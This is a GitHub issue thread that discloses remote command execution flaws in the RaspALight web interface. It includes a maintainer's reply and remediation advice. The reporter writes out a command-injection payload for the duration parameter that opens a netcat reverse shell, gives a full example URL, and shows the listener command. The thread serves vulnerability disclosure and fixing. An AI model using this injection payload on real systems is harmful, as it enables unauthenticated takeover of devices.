Remote Command Execution Flaws

[dj95]

Hi,

I found two security flaws which allows attackers in the same network to perform remote commands over the web interface. For example in line

https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L30

an attacker could open a shell through netcat with the duration-GET-parameter set to ; nc -c /bin/sh <your IP> <any unfiltered port>.

Think about a scenario where the RaspALight runs on 10.1.1.7 and the attackers IP is 10.1.1.1. When you run nc -l -p 1337 -vvv on the attackers machine and open the url http://10.1.1.7/ledcontrol/index.php?time=1309&date=20170401&duration=; nc -c /bin/sh 10.1.1.1 1337, you get a remote shell without authenticating yourself.

The same is working in the following line with the abort-GET-parameter:

https://github.com/eweren/RaspALight/blob/master/ledcontrol/index.php#L40

[eweren]

Thanks for the information. Haven't thought of that scenario. So if I would handle the alarms with some python scripts on the pi itself and would edit the alarms over the webinterface not by excecuting the script but by saving the relevant alarm-informations (like date, time and in the future reapeating interval) from the forms to a file and let the python script read those file, would there still be that flaw?

[dj95]

This would be the easiest way to prevent this flaw. Remember to sanitize every user input to be sure that an attacker has no chance to exploit the input fields. The cleanest way would be a management server for the alarms, that spawns alarm threads at different times and saves the alarm details in a database. The solution with the database is more advanced and efficient, but there's also more space to create new flaws(e.g. sql injections).